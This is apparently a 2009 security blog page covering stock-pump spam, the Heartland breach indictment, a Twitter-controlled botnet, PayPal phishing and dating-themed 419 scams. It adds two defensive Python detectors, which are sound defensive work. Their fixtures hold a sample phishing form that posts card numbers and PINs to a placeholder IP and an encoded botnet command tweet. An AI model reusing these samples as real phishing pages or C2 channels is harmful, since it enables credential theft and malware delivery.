Tuesday, August 25, 2009

Spammers Get Bullish

The "Pump and Dump" stock email scam was very popular in years past (at one time comprising close to 10-15% of all spam) but had fallen off the radar almost entirely until today. We began seeing a new pump and dump campaign this morning, coming in at a notable rate. If you are not familiar with this scam, here is how it works:

1. The scammer takes a position in a usually rather obscure "penny stock".
2. The scammer sends out a blast of emails making false claims about the stock to encourage investors to buy it.
3. As investors buy, the stock price goes up.
4. The scammer sells off all of their shares at the higher price, and the investors are left holding the bag.

This scam has been around for nearly a decade. It was popularized in 2000, when then 15-year-old Jonathan Lebed was charged by the SEC with "using the internet to conduct a stock manipulation scheme that made profits exceeding $270,000". In the years after that incident, seeing large PnD stock pushes was a daily occurrence, and along with the scams we saw many individuals charged and convicted for perpetrating them. It now appears spammers may be attempting to capitalize on the upward trend in the US stock market over the past several months. This morning's apparent PnD scam targets Insight Management Corporation. While this is a considerably lower-volume campaign than those seen in the past, it may still be having some effect on the stock price and trading volume.


In this case the scammers chose a stock that did in fact, just yesterday, announce that it will file its quarterly results by month end. The spammers appear to be trying to capitalize on the added attention some investors will pay because of that announcement, coupling that momentum with the price pressure applied by the spam campaign.
Here is a sample of the message:

Tuesday, August 18, 2009

Hacker Charged with US's Largest Data Breach to Date

It made big news back in January, the day after the presidential inauguration, when Heartland Payment Systems announced that its systems had been infected with malware since at least 2008, and that it had been siphoning off credit and debit card numbers and other private personal information ever since. The breach became one of the United States' largest breaches of private-sector data to date. Yesterday it was announced that Albert Gonzalez, aka "Segvec", along with two Russian co-conspirators, had been indicted for the breaches of Heartland, Hannaford Brothers, 7-Eleven and several other unnamed national retailers, from which they managed to steal around 130 million credit and debit card numbers and associated information such as names and expiration dates.
It seems that Gonzalez has a long history in this type of "work". He was once an administrator of the large underground carding site Shadowcrew, where his activities led to his arrest back in 2003. However, instead of being prosecuted, he was picked up as an informant by the Secret Service, helping it take down 28 other members of the site in what was dubbed "Operation Firewall". After this Gonzalez moved to Miami, where he continued running the credit card fraud ring he called "Get Rich or Die Tryin'". Once in Miami he changed his pseudonym to Segvec and kept up his same old activities. Even though the authorities were aware of, and in pursuit of, Segvec, at that point they were unaware that he was their old informant who once went by the name "Cumbajohnny".
Luckily he was indicted yesterday and faces a maximum penalty of 5 years in prison and a possible maximum fine of $250,000 on the computer fraud count, plus an additional 30 years and a $1 million fine on the conspiracy to commit wire fraud charge.
We still don't know how much of this information was abused or distributed as a result of the breach.
Read more at Wired[dot]com

Yahoo! Proposes 1¢ Stamp on Email

Forgive me if this turns more into a rant than objective opinion, but I find it simply silly that this idea made it past a fleeting thought, or maybe a board meeting. Yahoo!, or someone at Yahoo!, came up with this idea. Well, they didn't actually come up with it: Bill Gates proposed the same thing back in '04, and I do believe he was laughed off of the internets. Where was I? Oh yeah, someone came up with this idea, and the fact that it actually made it as far as a press release just seems silly to me.
Yahoo! suggests that email users purchase a pack of 500 virtual stamps for $5.00 US, that's a penny apiece to send email. The idea is that if you impose a charge on email, it becomes an unprofitable deterrent to spammers and they'll stop, or at least drastically slow down. Yeah, ok. The first major flaw in this idea is that the fee is optional. They thought ahead enough to realize that email has been designed to be free since its inception, and that the majority of the world would not get on board with this: most people would not limit their inbound email to senders who had purchased a virtual stamp, much less pay for stamps on their own outgoing mail. Fail.
The second major hole that I see is that the entire spam and virus world nowadays is money driven. I'm not sure if Yahoo! reads the news, but the criminal recently charged with stealing 130 million unique credit card numbers from Heartland Payment Systems and other retailers, in what has become the largest PI breach in history, suggests that spammers and other cybercriminals won't have a hard time coming up with the money to pay a 1 cent postage, even if this were ever to happen. Which it won't. Please feel free to add your free opinions while you still can. ;)

Monday, August 17, 2009

White House Spam


Just days ago, the White House was responsible for a flurry of purportedly unsolicited emails pushing the Obama health care agenda. The complaints referenced a 1,500-word e-mail sent Thursday in the name of White House senior adviser David Axelrod. The subject line: "Something worth forwarding." It seems that the White House has perhaps decided to fight fire with fire, as stated in the email: "Unfortunately, some of the old tactics we know so well are back - even the viral emails that fly unchecked and under the radar, spreading all sorts of lies and distortions". While any speculation on the White House's intentions with this letter would be just that, it does seem that they are using the same tactic that they condemn in the email.
On Sunday night the White House issued a response. The White House said that it will change its e-mail sign-up procedures after some recipients of these e-mails complained that they had not asked to receive updates.
“We are implementing measures to make subscribing to e-mails clearer, including preventing advocacy organizations from signing people up to our lists without their permission when they deliver petition signatures and other messages on individual’s behalf,” spokesman Nick Shapiro said in a statement Sunday night.
Shapiro said in the statement: “The White House e-mail list is made up of e-mail addresses obtained solely through the White House website. The White House doesn't purchase, upload or merge from any other list. … All e-mails come from the White House website as we have no interest in emailing anyone who does not want to receive an email.
“If an individual received the e-mail because someone else or a group signed them up or forwarded the email, we hope they were not too inconvenienced. Further, we suggest that they unsubscribe from the list by clicking the link at the bottom of the e-mail or tell whoever forwarded it to them not to forward such information anymore.”
Here is the email in question:
The White House, Washington
Dear Friend,
This is probably one of the longest emails I've ever sent, but it could be the most important.
Across the country we are seeing vigorous debate about health insurance reform. Unfortunately, some of the old tactics we know so well are back - even the viral emails that fly unchecked and under the radar, spreading all sorts of lies and distortions.
As President Obama said at the town hall in New Hampshire, "where we do disagree, let's disagree over things that are real, not these wild misrepresentations that bear no resemblance to anything that's actually been proposed."
So let's start a chain email of our own. At the end of my email, you'll find a lot of information about health insurance reform, distilled into 8 ways reform provides security and stability to those with or without coverage, 8 common myths about reform and 8 reasons we need health insurance reform now.
Right now, someone you know probably has a question about reform that could be answered by what's below. So what are you waiting for? Forward this email.
Thanks, David
David Axelrod, Senior Adviser to the President
P.S. We launched www.WhiteHouse.gov/realitycheck this week to knock down the rumors and lies that are floating around the internet. You can find the information below, and much more, there. For example, we've just added a video of Nancy-Ann DeParle from our Health Reform Office tackling a viral email head on. Check it out:

Friday, August 14, 2009

Command and Control via Twitter

A researcher from Arbor Networks has discovered several Twitter accounts that are being used to communicate with and issue commands to a botnet linked to Brazilian identity thieves.
The bot herders issue commands via tweets, and the bots listen by polling the account's RSS feed. Once a new tweet is posted, the bots react. The tweets themselves are base64-encoded links from which the bots download their new payloads. The links use another medium popular with malware authors, the URL shortener, in this case bit.ly, as can be seen once the base64 is decoded. By using the shortener, the bot herders further obfuscate the path to the payload and can move the actual hosting location without missing a beat.
This shows another spark of creativity from the dark side: using a popular communication medium to do their dirty work. I'm guessing this won't be the last time we see this, given its elegance and ease. I'm not sure it will rival the popularity of the private IRC channel for bot C&C, but I'm sure there are more out there already now that the cat is out of the bag.
Screen Capture Courtesy of Arbor Networks
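As an added illustration (not code from the original post or from Arbor Networks), the following Python script reproduces the polling side of the scheme described above and turns it into a detection check: it parses an RSS feed of tweets, base64-decodes each tweet, and reports those that decode to an http(s) URL. The feed, the account and the bit.ly link are constructed for the example; the real accounts and links are not reproduced here.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Constructed sample: the kind of RSS feed a bot would poll for a Twitter
# account. Two benign tweets plus one "command" tweet whose text is a
# base64-encoded short URL. The URL is hypothetical, not a real campaign link.
C2_URL = "http://bit.ly/abc"
ENCODED_TWEET = base64.b64encode(C2_URL.encode()).decode()   # "aHR0cDovL2JpdC5seS9hYmM="
SAMPLE_FEED = f"""<?xml version="1.0"?>
<rss version="2.0"><channel>
<item><title>having coffee, back later</title></item>
<item><title>{ENCODED_TWEET}</title></item>
<item><title>hello world</title></item>
</channel></rss>"""

# Strict base64 alphabet and a minimal URL shape; anything else is treated as chatter.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
URL_RE = re.compile(r"^https?://[^\s/]+\S*$")
SHORTENERS = ("bit.ly", "tinyurl.com", "is.gd")


def decode_if_url(text):
    """Return the decoded URL if `text` is base64 that decodes to an http(s) URL, else None."""
    text = text.strip()
    if not text or len(text) % 4 or not B64_RE.match(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if URL_RE.match(decoded) else None


def uses_shortener(url):
    """True when the decoded URL points at a known URL-shortening service."""
    host = url.split("//", 1)[1].split("/", 1)[0].lower()
    return host in SHORTENERS


def extract_commands(rss_xml):
    """Parse an RSS feed and return (tweet_text, decoded_url, via_shortener)
    for every item whose title decodes to a URL, i.e. looks like a C&C command."""
    root = ET.fromstring(rss_xml)
    hits = []
    for item in root.iter("item"):
        title = item.findtext("title") or ""
        url = decode_if_url(title)
        if url:
            hits.append((title, url, uses_shortener(url)))
    return hits


if __name__ == "__main__":
    for tweet, url, short in extract_commands(SAMPLE_FEED):
        print(f"command tweet {tweet!r} -> {url} (shortener: {short})")
```

The same check can be run over any feed of short messages; a legitimate tweet almost never consists solely of a base64 string of valid length that decodes to a URL, so a hit is a strong signal, and the shortener flag records the second layer of indirection the post describes.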

Wednesday, August 12, 2009

PayPal Phishing

PayPal phishing remains rather commonplace among all the institutions being phished today. The delivery schemes do tend to change and morph throughout the year, and today's example proves that: the attackers are using HTML attachments to deliver their payload.
Of course this attack begins in your inbox, as an email purporting to come from "support[dot]com" with the subject "Account Review". The body gives the same old song and dance:
"We have observed activity in this account that is unusual or potentially high risk." and they have locked your PayPal account. The From field should be hint number one that you're dealing with a scammer, aside from the fact that you received this email in the first place; you might reasonably expect an email about your PayPal account to actually come from PayPal.
The email goes on to instruct you to verify your account by opening the attached .html document and filling out a form. The form has several fields for the usual personal information: your name (which you'd think they'd know already), credit card number, expiration date, PIN, and bank name. After that you simply click the submit button on the page. Your information is then posted to a bare IP address, and the bad guys have your info.
At the other end of such an IP address, I'm used to finding what appears to be a blank page, or a mom-and-pop website that has been quietly hijacked and used to store victims' PI until the scammer stops back in to pick it up. This time, instead, the IP address answers with a Trixbox installation, the web interface for managing an Asterisk-based open source VoIP system. Finding someone to contact has not been an easy task, but we are working on finding someone at the other end to take this information down.
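As an added example (not the attachment from the campaign and not code from the original post), here is a Python triage script for HTML attachments of the kind described above. It parses every form in the file, checks where the form posts to, and flags forms whose action is a bare IP address or a host unrelated to PayPal, or that ask for card numbers and PINs. The sample attachment and the 192.0.2.10 address are constructed for the example; the real drop address is not reproduced here.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample modelled on the attachment described in the post.
# The action IP is from the documentation range, not the real drop site.
SAMPLE_ATTACHMENT = """<html><body>
<h2>PayPal Account Review</h2>
<form method="post" action="http://192.0.2.10/verify.php">
 Name <input name="fullname">
 Card number <input name="cardnumber">
 Expiration <input name="expdate">
 PIN <input name="pin">
 Bank <input name="bankname">
 <input type="submit" value="Submit">
</form></body></html>"""

# Field-name fragments that should never appear on an "account review" form.
SENSITIVE = ("card", "ccnum", "pin", "cvv", "password", "ssn")
# Hosts the brand actually uses; anything else is suspicious.
LEGIT_DOMAINS = ("paypal.com",)


class FormCollector(HTMLParser):
    """Collect each form's action, method and the names of its user-editable inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = a.get("name")
            if name and (a.get("type") or "text").lower() not in ("submit", "button", "hidden"):
                self._current["fields"].append(name.lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_is_ip(host):
    """True when the host part of the action is an IP literal rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def host_is_legit(host):
    """Exact or subdomain match only; 'evilpaypal.com' must not pass."""
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def analyze_attachment(html):
    """Return one finding per form: where it posts, which sensitive fields it
    collects, and the human-readable reasons it looks like a phish (empty if none)."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlsplit(form["action"]).hostname or "").lower()
        sensitive = [f for f in form["fields"] if any(k in f for k in SENSITIVE)]
        reasons = []
        if host_is_ip(host):
            reasons.append(f"form posts to raw IP {host}")
        elif host and not host_is_legit(host):
            reasons.append(f"form posts to unrelated host {host}")
        if sensitive:
            reasons.append("collects sensitive fields: " + ", ".join(sensitive))
        findings.append({"action": form["action"], "host": host,
                         "sensitive_fields": sensitive, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_attachment(SAMPLE_ATTACHMENT):
        print(f["action"], "->", "; ".join(f["reasons"]) or "no findings")
```

Run it over the attachment before anyone opens it in a browser; the action host is the same indicator the post describes (a bare IP rather than a PayPal name), and the sensitive-field list tells you what a victim who did submit the form has already lost. The domain check deliberately requires an exact or dotted-subdomain match, since a plain suffix test would let a look-alike registration through.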

Thursday, August 6, 2009

All I Wanted Was a Date

We've been seeing a lot of 419 scam emails posing as various things over the past couple of weeks: Dilbert cartoons, TED talks, Kid Rock Fan Club emails. All of them used a template of sorts to make them initially appear as the aforementioned, but underneath it all they were 419s. Today we started seeing another version of these poseur scams, though not quite as flashy.
These pretend to be email responses to Yahoo! Personals ads. Having never signed up for or received a response from Yahoo! Personals, I can only assume that these were set up to mimic what an actual reply to a personal ad would look like. They are complete with formatting such as the sender's email address, which of course is a Yahoo! address, as well as Yahoo! footers. One of the footers, which varied in each message, is specific to Yahoo! Personals: it contains a dating tip from the Yahoo! staff. It's a one-line topic, repeated in the email's subject line, and it includes a link to the actual Yahoo! site with more advice on the subject.
Be careful not to fall for any of these wolves in sheep's clothing, even if your potential date comes with $30 million.